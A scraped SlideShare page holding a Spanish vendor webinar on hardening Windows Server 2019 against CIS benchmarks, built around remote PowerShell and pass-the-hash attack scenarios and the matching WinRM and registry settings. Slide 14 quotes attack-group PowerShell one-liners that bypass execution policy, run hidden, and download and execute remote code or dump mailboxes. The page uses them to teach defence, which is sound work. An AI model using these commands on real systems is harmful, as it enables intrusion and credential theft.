presentacion_desamblado_de_una_computadora_base_a_las_normas_de_seguridad.pdfpresentacion_desamblado_de_una_computadora_base_a_las_normas_de_seguridad.pdf
presentacion_desamblado_de_una_computadora_base_a_las_normas_de_seguridad.pdfaxelv9257
 
presentación del desensamble y ensamble del equipo de computo en base a las n...
presentación del desensamble y ensamble del equipo de computo en base a las n...presentación del desensamble y ensamble del equipo de computo en base a las n...
presentación del desensamble y ensamble del equipo de computo en base a las n...axelv9257
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.FlorenciaCattelani
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosJhonJairoRodriguezCe
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxJorgeParada26
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativanicho110
 

Kürzlich hochgeladen (14)

investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXI
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptx
 
Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
Generaciones de las Computadoras..pdf...
Generaciones de las Computadoras..pdf...Generaciones de las Computadoras..pdf...
Generaciones de las Computadoras..pdf...
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 
infor expo AVANCES TECNOLOGICOS DEL SIGLO 21.pptx
infor expo AVANCES TECNOLOGICOS DEL SIGLO 21.pptxinfor expo AVANCES TECNOLOGICOS DEL SIGLO 21.pptx
infor expo AVANCES TECNOLOGICOS DEL SIGLO 21.pptx
 
presentacion_desamblado_de_una_computadora_base_a_las_normas_de_seguridad.pdf
presentacion_desamblado_de_una_computadora_base_a_las_normas_de_seguridad.pdfpresentacion_desamblado_de_una_computadora_base_a_las_normas_de_seguridad.pdf
presentacion_desamblado_de_una_computadora_base_a_las_normas_de_seguridad.pdf
 
presentación del desensamble y ensamble del equipo de computo en base a las n...
presentación del desensamble y ensamble del equipo de computo en base a las n...presentación del desensamble y ensamble del equipo de computo en base a las n...
presentación del desensamble y ensamble del equipo de computo en base a las n...
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos Basicos
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
 

WINDOWS 2019 HARDENING (Aseguramiento)

  • 1. Windows 2019 Hardening Garantice el cumplimiento de CIS y evite interrupciones en la producción Eduardo Rivero Gerente de Consultoría y Servicios de Seguridad Jerry Ludmir CEO, CalCom Software Dvir Goren CTO, CalCom Software
  • 2. Eduardo Rivero Gerente de Consultoría y Servicios, Securesoft • Gerente Regional de consultoría y servicios especializados con más de 17 años de experiencia en tecnología y seguridad de la información. • Líder QA de proyectos consultivos de ciberseguridad, y gestión de respuesta ante incidentes. • Experto en estándares y normativas de seguridad a nivel global: ISO 27001/9001, COBIT, SANS, ENISA, PCI, entre otros. • Certificado como CRISC, CBCP, LCSPC, SFPC en el rubro. • En su trayectoria, ha liderado más de 150 proyectos consultivos de ciberseguridad en los últimos 07 años
  • 3. Jerry Ludmir CEO, CalCom • Veterano de la industria de TI, con mas de 30 años de experiencia en la industria • Emprendedor y fundador de grandes empresas en la industria de TI • Fundó Calcom hace 15 años manteniéndose en su rol de liderazgo Dvir Goren CTO, CalCom • Veterano de la industria de TI con mas de 25 años de experiencia en la industria • Líder de opinión en el campo del aseguramiento de servidores con más de 13 años de gestión de proyectos complejos de fortalecimiento • Consultor de las organizaciones de seguridad nacional en el tema del aseguramiento de servidores • Lidera el equipo de productos de CalCom durante los últimos 15 años, desarrollando la estrategia y roadmap del producto
  • 4. Introducción • CalCom ofrece soluciones de automatización para el proceso de aseguramiento en equipos de seguridad y TI. • Apoyando grandes organizaciones para lograr el aseguramiento de su infraestructura por mas de 15 años. • Hacemos felices tanto a equipos de seguridad como de TI!
  • 5. Agenda • Aseguramiento de Servidores – ¿Qué es? ¿Porqué es importante? • Proceso Manual de Aseguramiento • Esquemas de Cumplimiento – Acercándonos al benchmark de CIS • Escenarios de aseguramiento - lab • Introducción al enfoque de automatización de aseguramiento de Calcom
  • 6. Aseguramiento de Servidores – ¿Qué es? ¿Porqué? • Mejora de la seguridad del servidor a través de una variedad de cambios en la configuración para reducir la superficie de ataque • Cumplimiento/auditoría: PCI, FDIC, ciber regulaciones gubernamentales, NIST 800-53 • Prácticas recomendadas de seguridad: eliminación de vulnerabilidades críticas Servicios Asegurar Ataques SMBv1 Wannacry RDP Bluekeep, Dejablue, Ryuk TLS POODLE NTLM MTLM Relay
  • 7. Proceso Manual de Aseguramiento Definir la política • Colaboración y aprobación de seguridad, TI, gerencia, auditoría • Granularidad de políticas: por función del servidor, versión del sistema operativo, etc. • Política basada en puntos de referencia conocidos Prueba de Laboratorio • Simular la producción en un entorno de prueba. • Realizar pruebas para evitar interrumpir la producción. Asegurando el Servidor • Asegurar los entornos de prueba y pre-producción antes de pasar a producción • Fortalecimiento del entorno de producción: ¿cómo? (GPO, manualmente, herramientas)
  • 8. Benchmarks de Cumplimiento - CIS Benchmarks • Documento de casi 1,000 páginas • Más de 400 recomendaciones de aseguramiento
  • 9. Benchmarks de Cumplimiento - CIS Benchmarks
  • 10.
  • 11.
  • 13. Escenario #1: Ataque Malicioso via PowerShell remoto PowerShell Como Plataforma de Ataque • Ataques maliciosos con PowerShell crecieron 661% en 2019* • PowerShell está en todos lados: plataformas de sistemas operativos, protocolos, aplicaciones, nube etc. • Interface con .NET y APIs de Windows • CMD.exe está normalmente bloqueado, pero no PowerShell • Ejecuta código en memoria sin tocar el disco • Descarga y ejecuta código desde otro sistema (Remote execution attack) • Una vez el intruso tiene acceso, todas las herramientas estándar del sistema operativo le están disponibles • Ataques mas famosos son Petya y NotPetya *Symantec security Center
  • 14. Attack groups Script invocations Pupa/ DeepPanda powershell.exe -w hidden -nologo -nointeractive -nop -ep bypass -c “IEX ((new-object net.webclient). downloadstring([REMOVED]))” Pupa/ DeepPanda powershell.exe -Win hidden -Enc [REMOVED] Pupa/ DeepPanda powershell -noprofile -windowstyle hidden -noninteractive -encodedcommand [REMOVED] SeaDuke powershell -executionpolicy bypass -File diag3.ps1 SeaDuke powershell -windowstyle hidden -ep bypass -f Dump.ps1 -Domain [REMOVED] -User [REMOVED] - Password [REMOVED] -Mailbox CozyDuke powershell.exe -WindowStyle hidden -encodedCommand [REMOVED] Odinaff powershell.exe -NoP -NonI -W Hidden -Enc [REMOVED] Buckeye powershell.exe -w 1 cls (New-Object Net.WebClient).DownloadFile(“””http://[REMOVED]/ images/rec.exe”””,”””$env:tmprec.exe”””);Iex %tmp%rec.exe Ejemplos de script usados en ataques dirigidos • Estos ataques son muy difíciles de detectar por los equipos de ciberseguridad • Se ven como actividad normal de usuarios Escenario #1: Ataque Malicioso via PowerShell remoto
  • 15. Setting: Name Category Default Value 2016 CIS 2016 CIS Control Level (2016) CIS Control ## (2016) Default Value 2019 CIS MS2019 CIS Control Level (2019) CIS Control # (2019) Allow Basic authentication WinRM Client Disabled L1 18.9.97.1.1 Disabled. (The WinRM client does not use Basic authentication.) Disabled L1 18.9.97.1.1 Allow unencrypted traffic WinRM Client Disabled L1 18.9.97.1.2 Disabled. (The WinRM client sends or receives only encrypted messages over the network.) Disabled L1 18.9.97.1.2 Disallow Digest authentication WinRM Client Enabled L1 18.9.97.1.3 Disabled. (The WinRM client will use Digest authentication.) Enabled L1 18.9.97.1.3 Allow Basic authentication WinRM Service Disabled L1 18.9.97.2.1 Disabled. (The WinRM service will not accept Basic authentication from a remote client.) Disabled L1 18.9.97.2.1 Allow remote server management through WinRM WinRM Service Disabled L2 18.9.97.2.2 Disabled. (The WinRM service will not respond to requests from a remote computer, regardless of whether or not any WinRM listeners are configured.) Disabled L2 18.9.97.2.2 Allow unencrypted traffic WinRM Service Disabled L1 18.9.97.2.3 Disabled. (The WinRM service sends or receives only encrypted messages over the network.) Disabled L1 18.9.97.2.3 Disallow WinRM from storing RunAs credentials WinRM Service Enabled L1 18.9.97.2.4 Disabled. (The WinRM service will allow the RunAsUser and RunAsPassword configuration values to be set for plug-ins and the RunAsPassword value will be stored securely.) Enabled L1 18.9.97.2.4 Allow Remote Shell Access Windows Remote Shell Disabled L2 18.9.98.1 Enabled. (New Remote Shell connections are allowed.) Disabled L2 18.9.98.1 Escenario #1: Ataque Malicioso via PowerShell remoto Recomendaciones de CIS
  • 16. 18.9.97.2.2 (L2) Ensure 'Allow remote server management through WinRM' is set to 'Disabled' (Scored) • GPO: Computer ConfigurationAdministrative TemplatesWindows ComponentsWindows Remote Management (WinRM)WinRM ServiceAllow remote server management through WinRM • Reg: HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWinRMServiceAllowAutoConfig Nota: • Según CIS no hay impacto en el servidor porque es el comportamientos por defecto • Es correcto solo para servidores recién instalados pero no considera las actividades administrativas posteriores en el ambiente Escenario #1: Ataque Malicioso via PowerShell remoto
  • 17. Ejemplo de Comandos: Escenario #1: Ataque Malicioso via PowerShell remoto
  • 18. Ejemplos de Comandos: Invoke-Command -ComputerName win2016iis -Credential chslabdave -ScriptBlock { Get-Culture} Escenario #1: Ataque Malicioso via PowerShell remoto
  • 19. Buscar en el log de eventos – event id 600: Nota: HostApplication=C:Wind owssystem32wsmprov host.exe -Embedding El host de PowerShell wsmprovhost.exe es un proceso proxy ejecutado de forma remota a través de PowerShell cuando se usa la Administración Remota de Windows (WinRM) Escenario #1: Ataque Malicioso via PowerShell remoto
  • 20. • Pass the Hash es una técnica de ataque que permite a un atacante autenticarse en un servidor o servicio remoto mediante el uso del hash NTLM o LM de la contraseña de un usuario. • Reemplaza la necesidad de robar la contraseña de texto sencillo • Proceso de ataque: • Obtiene el hash del nombre de usuario y su contraseña • Usa el hash (o contraseña) para autenticar el servidor remoto • Usa LM o NTLM • No es necesario aplicar fuerza bruta a los hash para obtener el texto de la contraseña sin cifrar • Debilidad: en el protocolo de autenticación, donde el hash de la contraseña permanece estático de una sesión a otra hasta que la contraseña se cambie . • Se puede realizar contra cualquier servidor o servicio que acepte autenticación LM o NTLM (Windows, Unix o cualquier otro sistema operativo). Escenario #2: Ataque Pass the Hash
  • 21. 2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and credentials for network authentication' is set to 'Enabled' (Scored) • GPO: Computer ConfigurationPoliciesWindows SettingsSecurity SettingsLocal PoliciesSecurity OptionsNetwork access: Do not allow storage of passwords and credentials for network authentication • Reg: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa:DisableDomainCreds Escenario #2: Ataque Pass the Hash: Recomendaciones CIS
  • 22. Escenario #2: Ataque Pass the Hash: Recomendaciones CIS
  • 23. 2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and credentials for network authentication' is set to 'Enabled' (Scored) Escenario #2: Ataque Pass the Hash: Recomendaciones CIS
  • 24. Automatización es esencial. Veamos como se puede hacer…
  • 25. CHS – El Proceso de Aseguramiento MODO APRENDIZAJE Simula el impacto de la política en el ambiente de producción MODO APLICACIÓN Aplica las políticas que endurecen cada servidor individualmente MODO MONITOREO Protege y controla el acceso en tiempo real
  • 26.
  • 27.
  • 28.
  • 29. CHS de Calcom • Automatiza el proceso de prueba de políticas. • Realiza un análisis de impacto de políticas directamente en el ambiente de producción • Aplica una política granular por servidor / versión / rol • Garantiza el cumplimiento continuo
  • 30. Contacte a CalCom Estamos aquí para ayudarlos con su proyecto de aseguramiento! Contáctenos vía: Email: info@calcomsoftware.com Página web de CalCom: www.calcomsoftware.com
  • 31. Q&A Use la función de Q&A de Zoom Escribanos también por el chat